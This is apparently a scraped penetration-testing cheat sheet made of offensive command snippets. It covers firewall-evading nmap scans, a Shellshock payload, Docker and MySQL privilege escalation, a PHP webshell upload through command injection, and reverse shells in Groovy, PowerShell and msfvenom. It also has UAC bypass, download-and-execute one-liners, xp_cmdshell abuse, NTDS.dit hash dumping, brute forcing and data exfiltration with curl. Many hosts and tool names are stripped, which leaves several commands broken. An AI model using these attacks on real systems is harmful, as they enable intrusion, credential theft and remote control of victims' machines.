$ ssh -lusername localhost -D 8080 -p 1337

Install Metasploit Community Edition in Kali 2.0

# github urls

wget && chmod +x && ./

create user

$ /opt/metasploit/createuser [] Please enter a username: root [] Creating user 'root' with password 'LsRRV[I^5' ...

activate your metasploit license


update metasploite

$ /opt/metasploit/app/msfupdate

use msfconsole

$ /opt/metasploit/app/msfconsole

Tor Nat Traversal

# install to server
$ apt-get install tor torsocks

bind ssh to tor service port 80


SocksPolicy accept SocksPolicy accept Log notice file /var/log/tor/notices.log RunAsDaemon 1 HiddenServiceDir /var/lib/tor/ssh_hidden_service/ HiddenServicePort 80 PublishServerDescriptor 0 $ /etc/init.d/tor start $ cat /var/lib/tor/ssh_hidden_service/hostname 3l5zstvt1zk5jhl662.onion

ssh connect from client

$ apt-get install torsocks $ torsocks ssh [email protected] -p 80

DNS brute forcing with fierce

$ ./ -dns
$ ./ –dns –wordlist myWordList.txt

Metagoofil metadata gathering tool

#automate search engine document retrieval and analysis. It also has the capability to provide MAC
# addresses, username listings, and more
$ python -d -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

A best NMAP scan strategy

# A best nmap scan strategy for networks of all sizes

Host Discovery - Generate Live Hosts List

$ nmap -sn -T4 -oG Discovery.gnmap $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt

Port Discovery - Most Common Ports

$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt

Port Discovery - Full Port Scans (UDP is very slow)

$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt

Print TCP\UDP Ports

$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}' $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'

Detect Service Version

$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt

Operating System Scan

$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt

OS and Service Detect

$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt

Nmap – Techniques for Avoiding Firewalls

# fragmentation
$ nmap -f

change default MTU size number must be a multiple of 8 (8,16,24,32 etc)

$ nmap --mtu 24

Generates a random number of decoys

$ nmap -D RND:10 [target]

Manually specify the IP addresses of the decoys

$ nmap -D decoy1,decoy2,decoy3 etc.

Idle Zombie Scan, first t need to find zombie ip

$ nmap -sI [Zombie IP] [Target IP]

Source port number specification

$ nmap --source-port 80 IP

Append Random Data to scan packages

$ nmap --data-length 25 IP

MAC Address Spoofing, generate different mac for host pc

$ nmap --spoof-mac Dell/Apple/3Com IP

Exploit servers to Shellshock

# A tool to find and exploit servers vulnerable to Shellshock
$ ./ -H  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

cat file

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $(

Root with Docker

# get root with docker
# user must be in docker group
[email protected]:~/docker-test$ id
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)

[email protected]:$ mkdir docker-test [email protected]:$ cd docker-test

[email protected]:~$ cat > Dockerfile FROM debian:wheezy


RUN mkdir -p $WORKDIR



[email protected]:$ docker build -t my-docker-image . [email protected]:$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c
'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' ./sh whoami


[email protected]:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'

Tunneling Over DNS to Bypass Firewall

# Tunneling Data and Commands Over DNS to Bypass Firewalls
# dnscat2 supports "download" and "upload" commands for getting files (data and programs) to and from # the victim’s host.

server (attacker)

$ apt-get update $ apt-get -y install ruby-dev git make g++ $ gem install bundler $ git clone $ cd dnscat2/server $ bundle install $ ruby ./dnscat2.rb dnscat2> New session established: 16059 dnscat2> session -i 16059

client (victum)

$ dnscat --host

Compile Assemble code

nasm -f elf32 simple32.asm -o simple32.o
ld -m elf_i386 simple32.o simple32

nasm -f elf64 simple.asm -o simple.o ld simple.o -o simple

Pivoting to Internal Network Via Non Interactive Shell

# generate ssh key with shell
$ wget -O - -q ""
$ wget -O - -q " -f /tmp/id_rsa -N \"\" "
$ wget -O - -q " /tmp/id_rsa"

add tempuser at attacker ps

$ useradd -m tempuser $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh $ wget -O - -q " /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys $ chmod 700 /home/tempuser/.ssh/authorized_keys $ chown -R tempuser:tempuser /home/tempuser/.ssh

create reverse ssh shell

$ wget -O - -q " -i /tmp/id_rsa -o StrictHostKeyChecking=no -R -N -f [email protected]"

Patator is a multi-purpose brute-forcer

# git clone /usr/share/patator

SMTP bruteforce

$ patator smtp_login host= user=Ololena password=FILE0 0=/usr/share/john/password.lst $ patator smtp_login host= user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host= helo='ehlo' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host= user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'

Metasploit Web terminal via Gotty

$ service postgresql start
$ msfdb init
$ apt-get install golang
$ mkdir /root/gocode
$ export GOPATH=/root/gocode
$ go get
$ gocode/bin/gotty -a -w msfconsole
# open in browser

Get full shell with POST RCE

attacker:~$ curl -i -s -k  -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' ''

attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' ''

attacker:~$ curl

download reverse shell to server (phpshell.php),%20fopen%28%22,%20%27r%27%29%29;%27

run nc and execute phpshell.php

attacker:~$ nc -nvlp 1337

Exiftool - Read and write meta information in files

$ wget
$ tar xzf Image-ExifTool-10.13.tar.gz
$ cd Image-ExifTool-10.13
$ perl Makefile.PL
$ make
$ ./exiftool main.gif

Get SYSTEM with Admin reverse_shell on Win7

msfvenom –p windows/shell_reverse_tcp LHOST= –f exe > danger.exe

#show account settings net user

download psexec to kali

upload psexec.exe file onto the victim machine with powershell script

echo $client = New-Object System.Net.WebClient > script.ps1 echo $targetlocation = "" >> script.ps1 echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

upload danger.exe file onto the victim machine with powershell script

echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "" >> script2.ps1 echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1

UAC bypass from precompiled binaries:

upload to victim pc with powershell

echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "" >> script3.ps1 echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1

create listener on kali

nc -lvp 4444

Use Akagi64 to run the danger.exe file with SYSTEM privileges

Akagi64.exe 1 C:\Users\User\Desktop\danger.exe

create listener on kali

nc -lvp 4444

The above step should give us a reverse shell with elevated privileges

Use PsExec to run the danger.exe file with SYSTEM privileges

psexec.exe –i –d –accepteula –s danger.exe

Get SYSTEM with Standard user reverse_shell on Win7 #ms15-051

check the list of patches applied on the target machine

to get the list of Hotfixes installed, type in the following command.

wmic qfe get wmic qfe | find "3057191"

Upload compile exploit to victim machine and run it

by default exploite exec cmd.exe with SYSTEM privileges, we need to change source code to run danger.exe download it and navigate to the file "main.c"

dump clear text password of the currently logged in user using wce.exe wce -w

dump hashes of other users with pwdump7

we can try online hash cracking tools such

Generate our own dic file based on the website content

$ cewl -m 4 -w dict.txt http://site.url
$ john --wordlist=dict.txt --rules --stdout

Bruteforce DNS records using Nmap

$ nmap --script dns-brute --script-args,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
$ nmap --script dns-brute

Identifying a WAF with Nmap

$ nmap -p 80,443 --script=http-waf-detect
$ nmap -p 80,443 --script=http-waf-fingerprint
$ wafw00f

MS08-067 - without the use of Metasploit

$ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1
$ searchsploit ms08-067
$ python /usr/share/exploitdb/platforms/windows/remote/ 1

Nikto scan with SQUID proxy

$ nikto -useproxy http://squid_ip:3128 -h http://target_ip

Hijack a binary’s full path in bash to exec your own code

$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
# It works ;)

Local privilege escalation through MySQL run with root privileges

# Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
$ wget
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname, -o raptor_udf2.o -lc
mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/user/'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/';
mysql> create function do_system returns integer soname '';
mysql> select * from mysql.func;
mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');

user:$ su - Password: user:# whoami root root:~# id uid=0(root) gid=0(root) groups=0(root)

Bruteforce SSH login with patator

root:~# patator ssh_login host= user=FILE0 password=FILE1 0=word.txt 1=word.txt -x ignore:mesg='Authentication failed.'

Using LD_PRELOAD to inject features to programs

$ wget
$ gcc -shared -fPIC ldpreload_shell.c -o
$ sudo -u user LD_PRELOAD=/tmp/ /usr/local/bin/somesoft

Exploit the OpenSSH User Enumeration Timing Attack

$ ./ -H -p 22 -U root -d 30 -v yes
$ ./ -H -p 22 -d 15 -v yes –dos no -L userfile.txt

Create a TCP circuit through validly formed HTTP requests with ReDuh


step 1

upload reDuh.jsp to victim server


step 2

run reDuhClient on attacker

$ java -jar reDuhClient.jar

step 3

connecting to management port with nc

$ nc -nvv 1010

step 4

forward localport to remote port with tunnel

[createTunnel] 7777:

step 5

connect to localhost with rdp

$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777

Jenkins Reverse Shell

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Powershell Reverse Shell

change IP and Port / Limmited version

$sm=(New-Object Net.Sockets.TCPClient('',9001)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Donwload file to Victim machine

cmd /c certutil -urlcache -split -f c:\Temp\shell.exe && C:\temp\shell.exe
powershell -v 2 -exec bypass IEX(New-Object Net.WebClient).downloadString("")

MSSQL attack

Service discovery


nmap -sU --script=ms-sql-info
msf > use auxiliary/scanner/mssql/mssql_ping
Enumeration Combine user passwords collected in other ways into a dictionary to enumerate MSSQL machines in the domain.


nmap -n -sV -Pn -vv -p --script=banner,ms-sql-empty-password,ms-sql-dac,ms-sql-dump-hashes,ms-sql-info,ms-sql-ntlm-info,vulners -oA _mssql.txt 
nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=user.txt,passdb=pass.txt
nmap -p 1433 --script ms-sql-brute --script-args userdb=user.txt,passdb=pass.txt
hydra -L userlist_sqlbrute.txt -P quick_password_spray.txt -f -o -u  -s 
msf > use auxiliary/admin/mssql/mssql_enum
msf > use auxiliary/scanner/mssql/mssql_login
Set it up PASS_FILE and RHOSTS.
python -h 192.168.1 -p 1433 -d pass.txt



nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami"
msf > auxiliary/admin/mssql/mssql_exec
msf > auxiliary/admin/mssql/mssql_sql 
msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 
MSDAT All the included above could be tested using MSDAT only.
Getting a shell xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
mssql_shell python script

python script

Connect to the service
sqsh -S mssql -D MyDB -U DOMAIN\\testuser -P MyTestingClearPassword1
exec sp_configure ‘show advanced options’, 1
exec sp_configure ‘xp_cmdshell’, 1
xp_cmdshell 'dir C:\'



Compile and run server

$ cd merlin/cmd/merlinserver
$ go build
$ sudo ./merlinServer-Linux-x64 -i -p 8443

Compile agent

$ cd merlin/cmd/merlinagent
$ sudo GOOS=windows GOARCH=386 go build

Generate Certificate

$ cd merlin/data/x509
$ openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/" -days 365


$ cd koadic
$ ./koadic
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|

    -{ COM Command &amp; Control }-
  Windows Post-Exploitation Tools
         Endless Intellect

        ~[ Version:  0xA ]~
        ~[ Stagers:    5 ]~
        ~[ Implants:  33 ]~

(koadic: sta/js/mshta)$ info

    NAME        VALUE               REQ     DESCRIPTION     
    -----       ------------        ----    -------------   
    SRVHOST        yes     Where the stager should call home
    SRVPORT     9999                yes     The port to listen for stagers on
    EXPIRES                         no      MM/DD/YYYY to stop calling home
    KEYPATH                         no      Private key for TLS communications
    CERTPATH                        no      Certificate for TLS communications
    MODULE                          no      Module to run once zombie is staged

(koadic: sta/js/mshta)$ set SRVPORT 1245 [+] SRVPORT => 1245 (koadic: sta/js/mshta)$ run [+] Spawned a stager at [!] Don't edit this URL! (See: 'help portfwd') [>] mshta

PHP Tiny Webshell

= ([email protected]$_GET[0]).$_(@$_GET[1]);

Donwload file to the victim machine

bitsadmin  /transfer mydownloadjob  /download  /priority normal  ^  C:\Users\username\Downloads\

Internal Monolog

Retrieving NTLM Hashes without Touching LSASS

NTDS - Domain Controller

Dumping and enumerating NTDS.dit - a file that contains information about Active Directory users (hashes!).

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Dump hashes

/usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

Interactive shell with nc

rlwrap nc -nlvp PORT

Tipis and tricks


We can use the folloiwng tricks as an RCE POC(in some engagements, the client asks for a limited tests on RCE POCs).


Pentester machine

tcpdump -nni  -e icmp[icmptype] == 8
Under the exploit run
You can specify a number of pings with -c agrments, If ICMP requests recieved, RCE achieved


Execute commands and recieve data with the POST request

curl -d "$(id)"
Recieve data
nc -nlvp 9988

Burpsuite Collaborator

Use burpcollaborator as POC * Linux

* Windows

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.